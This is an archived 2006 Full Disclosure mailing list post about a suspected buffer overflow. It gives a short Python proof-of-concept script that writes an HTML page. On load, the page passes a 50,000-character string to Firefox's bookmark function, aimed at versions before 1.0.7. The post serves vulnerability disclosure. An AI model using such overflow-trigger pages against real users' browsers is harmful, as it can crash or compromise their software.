Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Buffer Overflow vulnerability in Windows Display Manager [Suspected]
From: casiamo <casiamo () gmail com>
Date: Mon, 2 Jan 2006 17:09:51 +0100

Hello Sumit,

I saw this for some time ago too and I far as I know the below code would do
the same,
with the versions below 1.0.7. As I remember were all input fields
"vulnerable". I have
choosen the bookmark "name" field, which will popup after loading with a
long buffer.

html = open("firefox.html", "w")
buff = 'A' * 50000
html.write("<html><head>\n"
           "<script type=\"text/javascript\">\n"
           "function bookmarksite(title, url){\n"
           "if (document.all)\n"
           "window.external.AddFavorite(url, title);\n"
           "else if (window.sidebar)\n"
           "window.sidebar.addPanel(title, url, \"\")}\n"
           "</script></head>\n"
           "<body onload=\"javascript:bookmarksite('"+buff+"',
'http://www.mozilla.org&apos;)\"
\n"
           "</body></html>")
html.close()

Regards,

Casiamo
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]